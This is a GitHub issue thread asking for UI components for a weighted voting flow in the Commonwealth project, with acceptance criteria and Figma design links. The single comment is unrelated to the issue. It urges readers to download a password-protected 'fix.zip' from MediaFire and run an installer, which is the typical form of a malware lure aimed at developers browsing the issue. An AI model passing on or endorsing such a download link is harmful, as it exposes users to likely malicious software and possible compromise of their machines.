### ISSUE TITLE
UI components for weighted voting 

### ISSUE THREAD

**Issue by masvelio** [hicommonwealth/commonwealth#8981]
### Description

There is a new flow for enabling weighted voting described in [this ticket](https://github.com/hicommonwealth/commonwealth/issues/8898). Before it happen, we need to modify existing components and create new components. This ticket is for UI only

### Bucket ID

#7659

### User Stories / Acceptance Criteria

- modifications to create topic page (to confirm the scope)
- adding progress steps on top of the page
- adding weighted voting page step
- adding connecting erc 20 token page step + edition
- adding banner with token selected on topic page ([link](https://www.figma.com/design/DZ5IN1p0QUxpwd0csJRuvv/Contest-V2?node-id=313-48383&t=hL7Hs0tnhldtXK3W-1))

### Design Devlink

https://www.figma.com/design/DZ5IN1p0QUxpwd0csJRuvv/Contest-V2?node-id=313-48382

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
